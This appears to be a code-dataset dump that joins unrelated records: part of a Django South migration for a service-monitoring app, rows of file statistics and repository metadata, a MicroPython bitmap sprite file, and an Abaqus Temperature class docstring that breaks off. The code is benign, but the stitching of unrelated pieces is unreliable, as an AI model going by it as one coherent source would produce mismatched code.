('service_history_id', self.gf('django.db.models.fields.BigIntegerField')(db_index=True)),
('effective_url', self.gf('django.db.models.fields.URLField')(max_length=500, null=True, blank=True)),
('error_msg', self.gf('django.db.models.fields.CharField')(max_length=500, null=True, blank=True)),
('wordchecks_errors', self.gf('django.db.models.fields.CharField')(max_length=500, null=True, blank=True)),
))
db.send_create_signal(u'services', ['ServiceHistoryExtra'])
# Adding model 'ServiceHistoryArchive'
db.create_table(u'services_servicehistoryarchive', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('service_id', self.gf('django.db.models.fields.PositiveIntegerField')(db_index=True)),
('agent_id', self.gf('django.db.models.fields.PositiveIntegerField')()),
('response_time', self.gf('django.db.models.fields.DecimalField')(max_digits=5, decimal_places=2)),
('namelookup_time', self.gf('django.db.models.fields.DecimalField')(null=True, max_digits=5, decimal_places=2, blank=True)),
('connect_time', self.gf('django.db.models.fields.DecimalField')(null=True, max_digits=5, decimal_places=2, blank=True)),
('pretransfer_time', self.gf('django.db.models.fields.DecimalField')(null=True, max_digits=5, decimal_places=2, blank=True)),
('starttransfer_time', self.gf('django.db.models.fields.DecimalField')(null=True, max_digits=5, decimal_places=2, blank=True)),
('redirect_time', self.gf('django.db.models.fields.DecimalField')(null=True, max_digits=5, decimal_places=2, blank=True)),
('size_download', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
('speed_download', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
('redirect_count', self.gf('django.db.models.fields.PositiveSmallIntegerField')(null=True, blank=True)),
('num_connects', self.gf('django.db.models.fields.PositiveSmallIntegerField')(null=True, blank=True)),
('created', self.gf('django.db.models.fields.DateTimeField')(db_index=True)),
))
db.send_create_signal(u'services', ['ServiceHistoryArchive'])
# BIGINT
db.execute("ALTER TABLE `services_servicehistory` CHANGE COLUMN `id` `id` BIGINT(20) UNSIGNED NOT NULL AUTO_INCREMENT")
db.execute("ALTER TABLE `services_servicehistory` CHANGE `main_probe` `main_probe` BIGINT UNSIGNED NOT NULL")
db.execute("ALTER TABLE `services_servicehistoryarchive` CHANGE COLUMN `id` `id` BIGINT(20) UNSIGNED NOT NULL AUTO_INCREMENT")
db.execute("ALTER TABLE `services_servicehistoryextra` CHANGE COLUMN `id` `id` BIGINT(20) UNSIGNED NOT NULL AUTO_INCREMENT")
db.execute("ALTER TABLE `services_servicehistoryextra` CHANGE `service_history_id` `service_history_id` BIGINT UNSIGNED NOT NULL")
# PARTITIONS
db.execute("ALTER TABLE `services_servicehistory` DROP PRIMARY KEY , ADD PRIMARY KEY (`id`, `created`)")
db.execute("ALTER TABLE `services_servicehistory` CHANGE COLUMN `response_time` `response_time` DECIMAL(5,2) UNSIGNED NOT NULL , CHANGE COLUMN `namelookup_time` `namelookup_time` DECIMAL(5,2) UNSIGNED NULL DEFAULT NULL , CHANGE COLUMN `connect_time` `connect_time` DECIMAL(5,2) UNSIGNED NULL DEFAULT NULL , CHANGE COLUMN `pretransfer_time` `pretransfer_time` DECIMAL(5,2) UNSIGNED NULL DEFAULT NULL , CHANGE COLUMN `starttransfer_time` `starttransfer_time` DECIMAL(5,2) UNSIGNED NULL DEFAULT NULL , CHANGE COLUMN `redirect_time` `redirect_time` DECIMAL(5,2) UNSIGNED NULL DEFAULT NULL , CHANGE COLUMN `size_download` `size_download` INT(11) UNSIGNED NULL DEFAULT NULL , CHANGE COLUMN `speed_download` `speed_download` INT(11) UNSIGNED NULL DEFAULT NULL")
db.execute("ALTER TABLE `services_servicehistoryarchive` CHANGE COLUMN `response_time` `response_time` DECIMAL(5,2) UNSIGNED NOT NULL , CHANGE COLUMN `namelookup_time` `namelookup_time` DECIMAL(5,2) UNSIGNED NULL DEFAULT NULL , CHANGE COLUMN `connect_time` `connect_time` DECIMAL(5,2) UNSIGNED NULL DEFAULT NULL , CHANGE COLUMN `pretransfer_time` `pretransfer_time` DECIMAL(5,2) UNSIGNED NULL DEFAULT NULL , CHANGE COLUMN `starttransfer_time` `starttransfer_time` DECIMAL(5,2) UNSIGNED NULL DEFAULT NULL , CHANGE COLUMN `redirect_time` `redirect_time` DECIMAL(5,2) UNSIGNED NULL DEFAULT NULL , CHANGE COLUMN `size_download` `size_download` INT(11) UNSIGNED NULL DEFAULT NULL , CHANGE COLUMN `speed_download` `speed_download` INT(11) UNSIGNED NULL DEFAULT NULL")
db.execute("ALTER TABLE `services_servicehistoryarchive` DROP PRIMARY KEY , ADD PRIMARY KEY (`id`, `created`)")
db.execute("ALTER TABLE `services_servicehistory` PARTITION BY RANGE (TO_DAYS(created)) (PARTITION p_other VALUES LESS THAN (0))")
db.execute("ALTER TABLE `services_servicehistoryarchive` PARTITION BY RANGE (TO_DAYS(created)) (PARTITION p_other VALUES LESS THAN (0))")
def backwards(self, orm):
# Deleting model 'Queue'
db.delete_table(u'services_queue')
# Deleting model 'Agent'
db.delete_table(u'services_agent')
# Deleting model 'Service'
db.delete_table(u'services_service')
# Removing M2M table for field additional_agents on 'Service'
db.delete_table('services_service_additional_agents')
# Deleting model 'MonitoredPhrase'
db.delete_table(u'services_monitoredphrase')
# Deleting model 'AdditionalRequestParam'
db.delete_table(u'services_additionalrequestparam')
# Deleting model 'ServiceHistory'
db.delete_table(u'services_servicehistory')
# Deleting model 'ServiceHistoryExtra'
db.delete_table(u'services_servicehistoryextra')
# Deleting model 'ServiceHistoryArchive'
db.delete_table(u'services_servicehistoryarchive')
models = {
u'services.additionalrequestparam': {
'Meta': {'object_name': 'AdditionalRequestParam'},
'get': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'post': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'}),
'referer': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'service': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['services.Service']"}),
'useragent': ('django.db.models.fields.CharField', [], {'max_length': '250', 'blank': 'True'})
},
u'services.agent': {
'Meta': {'object_name': 'Agent'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'is_main': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'}),
'queue': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['services.Queue']", 'null': 'True', 'on_delete': 'models.PROTECT', 'blank': 'True'}),
'salt': ('django.db.models.fields.CharField', [], {'max_length': '16'})
},
u'services.monitoredphrase': {
'Meta': {'object_name': 'MonitoredPhrase'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'phrase': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'service': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['services.Service']"}),
'shall_not_be': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
u'services.queue': {
'Meta': {'object_name': 'Queue'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
u'services.service': {
'Meta': {'ordering': "[u'name']", 'object_name': 'Service'},
'additional_agents': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['services.Agent']", 'null': 'True', 'blank': 'True'}),
'auth_method': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '1', 'db_index': 'True'}),
'auth_pass': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'}),
'auth_user': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'}),
'base_referer': ('django.db.models.fields.URLField', [], {'default': "u''", 'max_length': '200', 'null': 'True', 'blank': 'True'}),
'base_useragent': ('django.db.models.fields.CharField', [], {'default': "u'Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3'", 'max_length': '250'}),
'comments': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'connection_timeout': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '30'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'hosting': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'is_core_service': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'is_technical_break': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_index': 'True'}),
'order': ('django.db.models.fields.PositiveIntegerField', [], {'default': '100'}),
'performance_issues_min_probes_count': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '8'}),
'performance_issues_time': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '15'}),
'response_code': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '200'}),
'sensitivity': ('django.db.models.fields.DecimalField', [], {'default': "'0.5'", 'max_digits': '3', 'decimal_places': '2'}),
'service_not_working_min_probes_count': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '8'}),
'time_delta': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '10'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
u'services.servicehistory': {
'Meta': {'ordering': "[u'-created']", 'object_name': 'ServiceHistory'},
'agent_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'connect_time': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '5', 'decimal_places': '2', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'db_index': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'main_probe': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'namelookup_time': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '5', 'decimal_places': '2', 'blank': 'True'}),
'num_connects': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'pretransfer_time': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '5', 'decimal_places': '2', 'blank': 'True'}),
'redirect_count': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'redirect_time': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '5', 'decimal_places': '2', 'blank': 'True'}),
'request_params_id': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'response_code': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'response_state': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '1', 'db_index': 'True'}),
'response_time': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '5', 'decimal_places': '2', 'blank': 'True'}),
'service_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'size_download': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'speed_download': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'starttransfer_time': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '5', 'decimal_places': '2', 'blank': 'True'}),
'tick_failed': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
u'services.servicehistoryarchive': {
'Meta': {'ordering': "[u'-created']", 'object_name': 'ServiceHistoryArchive'},
'agent_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'connect_time': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '5', 'decimal_places': '2', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'namelookup_time': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '5', 'decimal_places': '2', 'blank': 'True'}),
'num_connects': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'pretransfer_time': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '5', 'decimal_places': '2', 'blank': 'True'}),
'redirect_count': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'redirect_time': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '5', 'decimal_places': '2', 'blank': 'True'}),
'response_time': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'service_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'size_download': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'speed_download': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'starttransfer_time': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '5', 'decimal_places': '2', 'blank': 'True'})
},
u'services.servicehistoryextra': {
'Meta': {'object_name': 'ServiceHistoryExtra'},
'effective_url': ('django.db.models.fields.URLField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'error_msg': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'service_history_id': ('django.db.models.fields.BigIntegerField', [], {'db_index': 'True'}),
'wordchecks_errors': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['services']
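# Illustrative usage note (editor addition): under South this schema migration
# would typically be applied with
#   ./manage.py migrate services 0001
# and reversed (running backwards()) with
#   ./manage.py migrate services zero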
| 86.416382
| 776
| 0.639771
| 2,942
| 25,320
| 5.364378
| 0.067641
| 0.083133
| 0.144595
| 0.206564
| 0.871182
| 0.837093
| 0.817957
| 0.790331
| 0.750539
| 0.700101
| 0
| 0.01372
| 0.165205
| 25,320
| 293
| 777
| 86.416382
| 0.732933
| 0.025474
| 0
| 0.319838
| 0
| 0.036437
| 0.557962
| 0.299911
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008097
| false
| 0.008097
| 0.016194
| 0
| 0.036437
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e0aa244e7e229383bb01abf66cf3459886a9b588
| 6,786
|
py
|
Python
|
examples/ttgo_tdisplay_rp2040/toasters/t5.py
|
slabua/st7789py_mpy
|
31e6f94592563e2b5ad716c48486e605ca3911bb
|
[
"MIT"
] | 153
|
2020-02-02T11:03:14.000Z
|
2022-03-30T05:47:07.000Z
|
examples/TWATCH-2020/toasters/t5.py
|
skylin008/st7789_mpy
|
f304991fc5558be653df5f0de928494b85cbc60d
|
[
"MIT"
] | 58
|
2020-04-11T23:23:02.000Z
|
2022-03-26T20:45:23.000Z
|
examples/TWATCH-2020/toasters/t5.py
|
skylin008/st7789_mpy
|
f304991fc5558be653df5f0de928494b85cbc60d
|
[
"MIT"
] | 50
|
2020-02-02T11:05:23.000Z
|
2022-03-22T15:24:42.000Z
|
HEIGHT = 64
WIDTH = 64
COLORS = 8
BITS = 12288
BPP = 3
PALETTE = [0x0000,0x4049,0x609b,0x4082,0xe0ff,0xffff,0x2000,0x2000]
_bitmap =\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x49\x24\x92\x40\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x02\x49\x24\x92\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x24\x94\x92\x49\x24\x89\x24'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x24\x94\x92\x49\x24\x89\x24\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x02\x49\x49\x24\x92\x49\x24\x9b\x48'\
b'\x92\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02'\
b'\x49\x49\x24\x92\x49\x24\x9b\x48\x92\x40\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x24\x94\x92\x49\x24\x9b\x49\x24\x92\x49'\
b'\x24\x89\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x24\x94'\
b'\x92\x49\x24\x9b\x49\x24\x92\x49\x24\x89\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x02\x49\x49\x24\x92\x6d\x24\x92\x49\x24\x92\x6d'\
b'\x24\x92\x24\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x49\x49\x24'\
b'\x92\x6d\x24\x92\x49\x24\x92\x6d\x24\x92\x24\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x24\x94\x92\x49\x24\x9b\x49\x24\x92\x49\x26\xd2\x49'\
b'\x24\x92\x48\x92\x40\x00\x00\x00\x00\x00\x00\x24\x94\x92\x49\x24'\
b'\x9b\x49\x24\x92\x49\x26\xd2\x49\x24\x92\x48\x92\x40\x00\x00\x00'\
b'\x00\x02\x49\x49\x24\x92\x49\x26\xdb\x49\x24\x9b\x4a\x44\x9b\x91'\
b'\x24\x92\x49\x24\x89\x00\x00\x00\x00\x02\x49\x49\x24\x92\x49\x26'\
b'\xdb\x49\x24\x9b\x4a\x44\x9b\x91\x24\x92\x49\x24\x89\x00\x00\x00'\
b'\x00\x94\x92\x49\x24\x92\x49\x29\x12\x91\x29\x1b\x49\x24\x92\x6d'\
b'\x24\x92\x49\x24\x92\x24\x00\x00\x00\x94\x92\x49\x24\x92\x49\x29'\
b'\x12\x91\x29\x1b\x49\x24\x92\x6d\x24\x92\x49\x24\x92\x24\x00\x00'\
b'\x6c\x94\x9b\x49\x26\xd2\x49\x24\x92\x49\xb4\xa4\x49\xb4\x92\x49'\
b'\xb4\x92\x49\x24\x92\x48\x90\x00\x6c\x94\x9b\x49\x26\xd2\x49\x24'\
b'\x92\x49\xb4\xa4\x49\xb4\x92\x49\xb4\x92\x49\x24\x92\x48\x90\x00'\
b'\x6d\xb2\x52\x49\x24\x92\x49\xb4\x92\x49\x24\x9b\x49\xb4\x92\x49'\
b'\xb4\x92\x49\x24\x92\x49\x22\x40\x6d\xb2\x52\x49\x24\x92\x49\xb4'\
b'\x92\x49\x24\x9b\x49\xb4\x92\x49\xb4\x92\x49\x24\x92\x49\x22\x40'\
b'\x6d\xb6\xc9\x25\x24\x92\x6d\x26\xd2\x49\x24\x9b\x6d\x24\x92\x49'\
b'\xb6\xd2\x49\x24\x92\x49\x22\x49\x6d\xb6\xc9\x25\x24\x92\x6d\x26'\
b'\xd2\x49\x24\x9b\x6d\x24\x92\x49\xb6\xd2\x49\x24\x92\x49\x22\x49'\
b'\x6d\xb6\xdb\x6c\x96\xd2\x49\x24\x92\x49\x29\x12\x6d\xb4\xa4\x49'\
b'\x24\x92\x49\xb4\x92\x24\x96\xdb\x6d\xb6\xdb\x6c\x96\xd2\x49\x24'\
b'\x92\x49\x29\x12\x6d\xb4\xa4\x49\x24\x92\x49\xb4\x92\x24\x96\xdb'\
b'\x01\xb6\xdb\x6d\xb6\xc9\x25\x24\x92\x49\x24\x92\x49\xb4\x92\x49'\
b'\x24\x92\x49\x24\x89\x6d\xb6\xdb\x01\xb6\xdb\x6d\xb6\xc9\x25\x24'\
b'\x92\x49\x24\x92\x49\xb4\x92\x49\x24\x92\x49\x24\x89\x6d\xb6\xdb'\
b'\x00\x06\xdb\x6d\xb6\xdb\x6c\x92\x52\x49\x24\x92\x49\x24\x92\x49'\
b'\x24\x92\x24\x92\x5b\x6d\xb6\xdb\x00\x06\xdb\x6d\xb6\xdb\x6c\x92'\
b'\x52\x49\x24\x92\x49\x24\x92\x49\x24\x92\x24\x92\x5b\x6d\xb6\xdb'\
b'\x00\x00\x1b\x6d\xb6\xdb\x6d\xb6\xc9\x25\x26\xd2\x49\x24\x92\x49'\
b'\xb2\x49\x6d\xb6\xdb\x6d\xb6\xdb\x00\x00\x1b\x6d\xb6\xdb\x6d\xb6'\
b'\xc9\x25\x26\xd2\x49\x24\x92\x49\xb2\x49\x6d\xb6\xdb\x6d\xb6\xdb'\
b'\x00\x00\x00\x01\xb6\xdb\x6d\xb6\xdb\x6c\x94\x92\x49\x24\x89\x24'\
b'\x96\xdb\x6d\xb6\xdb\x6d\xb0\x00\x00\x00\x00\x01\xb6\xdb\x6d\xb6'\
b'\xdb\x6c\x94\x92\x49\x24\x89\x24\x96\xdb\x6d\xb6\xdb\x6d\xb0\x00'\
b'\x00\x00\x00\x00\x00\x1b\x6d\xb6\xdb\x6d\xb2\x49\x24\x92\x5b\x6d'\
b'\xb6\xdb\x6d\xb6\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x1b\x6d\xb6'\
b'\xdb\x6d\xb2\x49\x24\x92\x5b\x6d\xb6\xdb\x6d\xb6\xdb\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x01\xb6\xdb\x6d\xb6\xdb\x6d\xb6\xdb\x6d'\
b'\xb6\xdb\x6d\xb6\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xb6'\
b'\xdb\x6d\xb6\xdb\x6d\xb6\xdb\x6d\xb6\xdb\x6d\xb6\xc0\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x1b\x6d\xb6\xdb\x6d\xb6\xdb\x6d'\
b'\xb6\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x1b\x6d\xb6\xdb\x6d\xb6\xdb\x6d\xb6\xdb\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6d\xb6\xdb\x6d\xb6\xdb\x6d'\
b'\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x6d\xb6\xdb\x6d\xb6\xdb\x6d\xb0\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\xdb\x6d\xb6\xc0\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x06\xdb\x6d\xb6\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
BITMAP = memoryview(_bitmap)
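# Illustrative decode sketch (editor addition; assumes row-major, MSB-first
# packing at BPP bits per pixel, each index selecting a PALETTE entry -- the
# layout implied by HEIGHT * WIDTH * BPP == BITS above; MicroPython/Python 3):
def pixel_color(x, y):
    bit = (y * WIDTH + x) * BPP
    index = 0
    for i in range(BPP):
        byte, offset = divmod(bit + i, 8)
        index = (index << 1) | ((BITMAP[byte] >> (7 - offset)) & 1)
    return PALETTE[index]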
| 64.628571
| 68
| 0.710875
| 1,655
| 6,786
| 2.913595
| 0.033837
| 0.939444
| 1.267316
| 1.513065
| 0.971796
| 0.970344
| 0.968063
| 0.967234
| 0.659063
| 0.59664
| 0
| 0.417429
| 0.017536
| 6,786
| 104
| 69
| 65.25
| 0.305835
| 0
| 0
| 0.336538
| 0
| 0.923077
| 0.905393
| 0.905393
| 0
| 1
| 0.007073
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
46146e7c66251a26b74ae41505d32e18be93b9c7
| 19,946
|
py
|
Python
|
src/abaqus/PredefinedField/Temperature.py
|
Haiiliin/PyAbaqus
|
f20db6ebea19b73059fe875a53be370253381078
|
[
"MIT"
] | 7
|
2022-01-21T09:15:45.000Z
|
2022-02-15T09:31:58.000Z
|
src/abaqus/PredefinedField/Temperature.py
|
Haiiliin/PyAbaqus
|
f20db6ebea19b73059fe875a53be370253381078
|
[
"MIT"
] | null | null | null |
src/abaqus/PredefinedField/Temperature.py
|
Haiiliin/PyAbaqus
|
f20db6ebea19b73059fe875a53be370253381078
|
[
"MIT"
] | null | null | null |
from abaqusConstants import *
from .PredefinedField import PredefinedField
from ..Region.Region import Region
class Temperature(PredefinedField):
"""The Temperature object stores the data for temperature predefined fields.
The Temperature object is derived from the PredefinedField object.
Attributes
----------
name: str
A String specifying the repository key.
distributionType: SymbolicConstant
A SymbolicConstant specifying how the predefined field varies spatially. Possible values
are UNIFORM, USER_DEFINED, FROM_FILE, FIELD, FROM_FILE_AND_USER_DEFINED, and
DISCRETE_FIELD. The default value is UNIFORM.
field: str
A String specifying the name of the AnalyticalField or :py:class:`~abaqus.Field.DiscreteField.DiscreteField` object associated
with this predefined field. The **field** argument applies only when
**distributionType=FIELD** or **distributionType=DISCRETE_FIELD**. The default value is an
empty string.
region: Region
A :py:class:`~abaqus.Region.Region.Region` object specifying the region to which the predefined field is applied. **region**
is ignored if the predefined field has an **instances** member available. **region** is also
ignored if the predefined field has a **distributionType** member available, and
**distributionType=FROM_FILE** or FROM_FILE_AND_USER_DEFINED.
Notes
-----
This object can be accessed by:
